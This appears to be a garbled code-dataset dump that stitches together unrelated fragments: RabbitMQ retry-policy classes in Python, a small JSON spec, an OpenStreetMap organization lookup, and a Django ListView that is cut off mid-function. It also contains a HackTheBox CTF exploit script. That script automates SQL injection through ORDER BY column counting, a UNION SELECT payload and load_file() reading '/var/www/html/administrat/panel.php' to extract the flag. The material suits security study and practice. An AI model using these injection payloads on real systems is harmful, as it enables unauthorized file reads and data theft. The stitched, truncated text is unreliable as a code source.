**kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nNoting is perfect, errors and timeouts may happen, and when such failures happen, the\nconsumer has to decide what to do with that. By default, the consumer would reject the\nenvelope (RabbitMQ message) when a failure happens. However, errors and timeouts\nissues, unless there is a software bug, usually solved with retries. Just like the\nrouting, the consumer doesn't make the retry decision itself, the consumer delegates\nit to a retry policy. Retry policy defines how the retry is performed. Retries\nusually happens with back-offs to avoid worsening the situation by hammering other\nservices with more requests, especially if it was a timeout issue. The consumer can be\nconfigured to use a retry policy by calling :meth:`.Consumer.set_retry_policy`, passing\nan instance of :class:`.RetryPolicy`. When a retry policy is set, the consumer won't\nreject messages, but rather, it send them to the retry policy to deal with the\nsituation by invoking :meth:`.RetryPolicy.retry` method. Based on it's implementation,\nThe retry policy decides how to do retries.\n\nThere are 4 different retry policies available:\n\n1. :class:`.UnlimitedRetriesPolicy`, Unlimited retries policy\n2. :class:`.LimitedRetriesPolicy`, Limited retries policy\n3. :class:`.FixedDelayUnlimitedRetriesPolicy`, Fixed delay unlimited retries policy\n4. :class:`.FixedDelayLimitedRetriesPolicy`, Fixed delay limited retries policy\n\nCustom retry policies can be created by implementing the base class\n:class:`.RetryPolicy`\n\"\"\"\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass RetryPolicy(object):\n \"\"\"Base class for retry policies.\n\n Subclasses MUST implement :meth:`retry` method.\n \"\"\"\n\n def __init__(self, **kwargs):\n # type: (RetryPolicy) -> None\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n # type: (RetryPolicy, Envelope) -> None\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n # type: (BaseRetryPolicy, Consumer, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n # To avoid frequent retry queue create and destroy for low retry delays\n self.min_retry_queue_ttl = 20 * 1000 # 20 seconds\n\n def set_original_delivery_info_header(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> None\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {\n 'consumer_tag': envelope.delivery_info.consumer_tag,\n 'delivery_tag': envelope.delivery_info.delivery_tag,\n 'redelivered': envelope.delivery_info.redelivered,\n 'exchange': envelope.delivery_info.exchange,\n 'routing_key': envelope.delivery_info.routing_key\n }\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n # type: (BaseRetryPolicy, Envelope) -> int\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = envelope.get_header('x-death')\n\n if death_header is None:\n return 0\n\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n # type: (BaseRetryPolicy, int) -> str\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(\n self.consumer.queue_name, self.retry_queue_suffix, delay_in_ms)\n\n # To avoid frequent queue create and destroy for low retry delays\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n\n self.consumer.channel.queue_declare(\n callback=None,\n queue=retry_queue_name,\n durable=self.consumer.durable,\n nowait=True,\n arguments={\n 'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms,\n 'x-expires': queue_ttl\n })\n logger.warning(\n 'Retry queue \"{}\" is created/redeclared'.format(retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self,\n consumer,\n initial_delay,\n max_delay,\n delay_incremented_by,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy,\n self).__init__(consumer, retry_queue_suffix, **kwargs)\n\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n # type: (UnlimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + (death_count * self.delay_incremented_by)\n\n if delay > self.max_delay:\n delay = self.max_delay\n\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n retry_delays,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer, retry_queue_suffix,\n **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n # type: (LimitedRetriesPolicy, Envelope) -> None\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n\n # Save original delivery information\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n\n self.consumer.channel.basic_publish(\n exchange='',\n routing_key=retry_queue_name,\n properties=envelope.properties,\n body=envelope.payload)\n\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.format(\n envelope.message_id, delay, death_count + 1))\n else:\n logger.warning(\n 'Message [{}] exceeded retry limit; death count: {}'.format(\n envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(\n envelope.delivery_tag, requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id))\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n # type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n initial_delay=delay,\n max_delay=delay,\n delay_incremented_by=0,\n retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self,\n consumer,\n delay,\n retries_limit,\n retry_queue_suffix='retry',\n **kwargs):\n # type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(\n consumer=consumer,\n retry_delays=retry_delays,\n retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n",
"step-ids": [
9,
13,
15,
23,
27
]
}
|
[
9,
13,
15,
23,
27
] |
import requests
from bs4 import BeautifulSoup
import sys
import re
if len(sys.argv)<2:
print("Syntax : python %s <port>")%(str(sys.argv[0]))
else:
print('-'*55)
print("HTB WEB-CHALLENGE coded by ZyperX [Freelance]")
print('-'*55)
r=requests.session()
port=str(sys.argv[1])
url="http://docker.hackthebox.eu:"
url=url+port
uri="/portfolio.php?id=1"
url=url+uri
print("[*]SQLi Affected URI : %s")%(uri)
print("[*]Counting Columns")
for x in range(1,20):
payload=(" order by %i --+")%(x)
nurl=url+payload
op=r.get(nurl)
soup=BeautifulSoup(op.text,'html.parser')
soup=soup.find('p')
soup=str(soup)
size=len(soup.split())
print("[*]Page size at order by %s : %s")%(x,size)
if size < 36 :
col= x-1
break
print("-"*55)
print("[*]Number of Columns : %d")%(col)
print("[*]Web App Vulnerable with FILE PRIVILEGE SQLI")
print("[*]Trying to read content of \'/var/www/html/administrat/panel.php\'")
upayload=" union all select 1"
for x in range(2,col+1):
x=str(x)
upayload=upayload+","+x
upayload=upayload+" --+"
url=url+upayload
print("[*]Executing. : %s")%(url)
op=r.get(url)
op=str(op.text)
if op.find("2"):
print("[*]Column 2 is reflected");
print("[*]Injecting payloads in column 2....");
upayload=upayload.replace('2','load_file(\'/var/www/html/administrat/panel.php\')')
url="http://docker.hackthebox.eu:"+port+uri+upayload
print("[*]Excecuting : %s")%(url)
op=r.get(url)
op=str(op.text)
op=re.search("HTB.*?<",op)
op=str(op.group())
op=op.replace('<','')
print("-"*55)
print("[*]Flag : %s")%(op)
|
normal
|
{
"blob_id": "88ec9484e934ce27b13734ca26f79df71b7677e6",
"index": 82,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\n<mask token>\nprint('[*]Executing. : %s') % url\n<mask token>\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\n<mask token>\nprint('[*]Excecuting : %s') % url\n<mask token>\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-3": "<mask token>\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-4": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv) < 2:\n print('Syntax : python %s <port>') % str(sys.argv[0])\nelse:\n print('-' * 55)\n print('HTB WEB-CHALLENGE coded by ZyperX [Freelance]')\n print('-' * 55)\n r = requests.session()\n port = str(sys.argv[1])\n url = 'http://docker.hackthebox.eu:'\n url = url + port\n uri = '/portfolio.php?id=1'\n url = url + uri\n print('[*]SQLi Affected URI : %s') % uri\n print('[*]Counting Columns')\n for x in range(1, 20):\n payload = ' order by %i --+' % x\n nurl = url + payload\n op = r.get(nurl)\n soup = BeautifulSoup(op.text, 'html.parser')\n soup = soup.find('p')\n soup = str(soup)\n size = len(soup.split())\n print('[*]Page size at order by %s : %s') % (x, size)\n if size < 36:\n col = x - 1\n break\n print('-' * 55)\n print('[*]Number of Columns : %d') % col\n print('[*]Web App Vulnerable with FILE PRIVILEGE SQLI')\n print(\"[*]Trying to read content of '/var/www/html/administrat/panel.php'\")\n upayload = ' union all select 1'\n for x in range(2, col + 1):\n x = str(x)\n upayload = upayload + ',' + x\nupayload = upayload + ' --+'\nurl = url + upayload\nprint('[*]Executing. : %s') % url\nop = r.get(url)\nop = str(op.text)\nif op.find('2'):\n print('[*]Column 2 is reflected')\n print('[*]Injecting payloads in column 2....')\nupayload = upayload.replace('2',\n \"load_file('/var/www/html/administrat/panel.php')\")\nurl = 'http://docker.hackthebox.eu:' + port + uri + upayload\nprint('[*]Excecuting : %s') % url\nop = r.get(url)\nop = str(op.text)\nop = re.search('HTB.*?<', op)\nop = str(op.group())\nop = op.replace('<', '')\nprint('-' * 55)\nprint('[*]Flag : %s') % op\n",
"step-5": "import requests\nfrom bs4 import BeautifulSoup\nimport sys\nimport re\nif len(sys.argv)<2:\n print(\"Syntax : python %s <port>\")%(str(sys.argv[0]))\nelse:\n print('-'*55)\n print(\"HTB WEB-CHALLENGE coded by ZyperX [Freelance]\")\n print('-'*55)\n r=requests.session()\n port=str(sys.argv[1])\n url=\"http://docker.hackthebox.eu:\"\n url=url+port\n uri=\"/portfolio.php?id=1\"\n url=url+uri\n print(\"[*]SQLi Affected URI : %s\")%(uri)\n print(\"[*]Counting Columns\")\n for x in range(1,20):\n payload=(\" order by %i --+\")%(x)\n nurl=url+payload\n op=r.get(nurl)\n soup=BeautifulSoup(op.text,'html.parser')\n soup=soup.find('p')\n soup=str(soup)\n size=len(soup.split())\n print(\"[*]Page size at order by %s : %s\")%(x,size)\n if size < 36 :\n col= x-1\n break \n print(\"-\"*55)\n print(\"[*]Number of Columns : %d\")%(col)\n print(\"[*]Web App Vulnerable with FILE PRIVILEGE SQLI\")\n print(\"[*]Trying to read content of \\'/var/www/html/administrat/panel.php\\'\")\n upayload=\" union all select 1\"\n for x in range(2,col+1):\n x=str(x)\n upayload=upayload+\",\"+x\nupayload=upayload+\" --+\"\nurl=url+upayload\nprint(\"[*]Executing. : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nif op.find(\"2\"):\n print(\"[*]Column 2 is reflected\");\n print(\"[*]Injecting payloads in column 2....\");\nupayload=upayload.replace('2','load_file(\\'/var/www/html/administrat/panel.php\\')')\nurl=\"http://docker.hackthebox.eu:\"+port+uri+upayload\nprint(\"[*]Excecuting : %s\")%(url)\nop=r.get(url)\nop=str(op.text)\nop=re.search(\"HTB.*?<\",op)\nop=str(op.group())\nop=op.replace('<','')\nprint(\"-\"*55)\nprint(\"[*]Flag : %s\")%(op)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
{
"module_spec": {
"module_name": "Spec1"
}
}
|
normal
|
{
"blob_id": "1cfb0690ebe1d7c6ab93fa6a4bc959b90b991bc8",
"index": 7016,
"step-1": "<mask token>\n",
"step-2": "{'module_spec': {'module_name': 'Spec1'}}\n",
"step-3": "{\n \"module_spec\": {\n \"module_name\": \"Spec1\"\n }\n}\n\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_organizations_by_address_border(city: str, nodes: list[tuple[float,
float]]) ->list[dict[str, Any]]:
result = []
radius = 0.0025
with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:
cursor = connection.cursor()
lat, lon = get_average_point(nodes)
south, north = lat - radius, lat + radius
west, east = lon - radius, lon + radius
request_template = (
f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'
)
organizations_within_radius = []
nodes_columns = get_table_columns(cursor, 'nodes')
ways_columns = get_table_columns(cursor, 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
nodes_columns, cursor.fetchall())
request_template = request_template.replace('nodes', 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
ways_columns, cursor.fetchall())
for organization in organizations_within_radius:
if is_point_in_polygon((organization['lat'], organization['lon']),
nodes):
result.append(organization)
return result
<|reserved_special_token_1|>
import os
import sqlite3
from typing import Any
from direct_geocoder import get_table_columns
from reverse_geocoder import is_point_in_polygon
from utils import zip_table_columns_with_table_rows, get_average_point
def get_organizations_by_address_border(city: str, nodes: list[tuple[float,
float]]) ->list[dict[str, Any]]:
result = []
radius = 0.0025
with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:
cursor = connection.cursor()
lat, lon = get_average_point(nodes)
south, north = lat - radius, lat + radius
west, east = lon - radius, lon + radius
request_template = (
f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'
)
organizations_within_radius = []
nodes_columns = get_table_columns(cursor, 'nodes')
ways_columns = get_table_columns(cursor, 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
nodes_columns, cursor.fetchall())
request_template = request_template.replace('nodes', 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
ways_columns, cursor.fetchall())
for organization in organizations_within_radius:
if is_point_in_polygon((organization['lat'], organization['lon']),
nodes):
result.append(organization)
return result
<|reserved_special_token_1|>
import os
import sqlite3
from typing import Any
from direct_geocoder import get_table_columns
from reverse_geocoder import is_point_in_polygon
from utils import zip_table_columns_with_table_rows, get_average_point
def get_organizations_by_address_border(city: str,
nodes: list[tuple[float, float]]) \
-> list[dict[str, Any]]:
result = []
radius = 0.0025
with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:
cursor = connection.cursor()
lat, lon = get_average_point(nodes)
south, north = lat - radius, lat + radius
west, east = lon - radius, lon + radius
request_template = f"SELECT * FROM nodes WHERE " \
f"(lat BETWEEN ? AND ?) AND " \
f"(lon BETWEEN ? AND ?) AND " \
f"(highway IS NULL) AND" \
f"(NOT(name IS NULL) OR " \
f"NOT(shop IS NULL) OR " \
f"NOT(amenity IS NULL))"
organizations_within_radius = []
nodes_columns = get_table_columns(cursor, 'nodes')
ways_columns = get_table_columns(cursor, 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
nodes_columns,
cursor.fetchall())
request_template = request_template.replace('nodes', 'ways')
cursor.execute(request_template, (south, north, west, east))
organizations_within_radius += zip_table_columns_with_table_rows(
ways_columns,
cursor.fetchall())
for organization in organizations_within_radius:
if is_point_in_polygon((organization['lat'], organization['lon']),
nodes):
result.append(organization)
return result
|
flexible
|
{
"blob_id": "79f945694f853e5886b590020bb661ecd418510d",
"index": 4567,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_organizations_by_address_border(city: str, nodes: list[tuple[float,\n float]]) ->list[dict[str, Any]]:\n result = []\n radius = 0.0025\n with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:\n cursor = connection.cursor()\n lat, lon = get_average_point(nodes)\n south, north = lat - radius, lat + radius\n west, east = lon - radius, lon + radius\n request_template = (\n f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'\n )\n organizations_within_radius = []\n nodes_columns = get_table_columns(cursor, 'nodes')\n ways_columns = get_table_columns(cursor, 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n nodes_columns, cursor.fetchall())\n request_template = request_template.replace('nodes', 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n ways_columns, cursor.fetchall())\n for organization in organizations_within_radius:\n if is_point_in_polygon((organization['lat'], organization['lon']),\n nodes):\n result.append(organization)\n return result\n",
"step-3": "import os\nimport sqlite3\nfrom typing import Any\nfrom direct_geocoder import get_table_columns\nfrom reverse_geocoder import is_point_in_polygon\nfrom utils import zip_table_columns_with_table_rows, get_average_point\n\n\ndef get_organizations_by_address_border(city: str, nodes: list[tuple[float,\n float]]) ->list[dict[str, Any]]:\n result = []\n radius = 0.0025\n with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:\n cursor = connection.cursor()\n lat, lon = get_average_point(nodes)\n south, north = lat - radius, lat + radius\n west, east = lon - radius, lon + radius\n request_template = (\n f'SELECT * FROM nodes WHERE (lat BETWEEN ? AND ?) AND (lon BETWEEN ? AND ?) AND (highway IS NULL) AND(NOT(name IS NULL) OR NOT(shop IS NULL) OR NOT(amenity IS NULL))'\n )\n organizations_within_radius = []\n nodes_columns = get_table_columns(cursor, 'nodes')\n ways_columns = get_table_columns(cursor, 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n nodes_columns, cursor.fetchall())\n request_template = request_template.replace('nodes', 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n ways_columns, cursor.fetchall())\n for organization in organizations_within_radius:\n if is_point_in_polygon((organization['lat'], organization['lon']),\n nodes):\n result.append(organization)\n return result\n",
"step-4": "import os\nimport sqlite3\nfrom typing import Any\n\nfrom direct_geocoder import get_table_columns\nfrom reverse_geocoder import is_point_in_polygon\nfrom utils import zip_table_columns_with_table_rows, get_average_point\n\n\ndef get_organizations_by_address_border(city: str,\n nodes: list[tuple[float, float]]) \\\n -> list[dict[str, Any]]:\n result = []\n radius = 0.0025\n with sqlite3.connect(os.path.join('db', f'{city}.db')) as connection:\n cursor = connection.cursor()\n lat, lon = get_average_point(nodes)\n south, north = lat - radius, lat + radius\n west, east = lon - radius, lon + radius\n request_template = f\"SELECT * FROM nodes WHERE \" \\\n f\"(lat BETWEEN ? AND ?) AND \" \\\n f\"(lon BETWEEN ? AND ?) AND \" \\\n f\"(highway IS NULL) AND\" \\\n f\"(NOT(name IS NULL) OR \" \\\n f\"NOT(shop IS NULL) OR \" \\\n f\"NOT(amenity IS NULL))\"\n organizations_within_radius = []\n nodes_columns = get_table_columns(cursor, 'nodes')\n ways_columns = get_table_columns(cursor, 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n nodes_columns,\n cursor.fetchall())\n request_template = request_template.replace('nodes', 'ways')\n cursor.execute(request_template, (south, north, west, east))\n organizations_within_radius += zip_table_columns_with_table_rows(\n ways_columns,\n cursor.fetchall())\n for organization in organizations_within_radius:\n if is_point_in_polygon((organization['lat'], organization['lon']),\n nodes):\n result.append(organization)\n return result\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from django.shortcuts import render
from django.views.generic.list import ListView
from .models import Student
# Create your views here.
class StudentListView(ListView):
model = Student
# Custom has a HIGH priority than default in any field
template_name = 'staff/student_list.html'
# template_name_suffix = '_list'
ordering = ['name']
# context_object_name = 'students'
def get_queryset(self):
return Student.objects.filter(course='Python')
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
context['freshers'] = Student.objects.all().order_by('name')
return context
def get_template_names(self):
# if self.request.user.is_superuser:
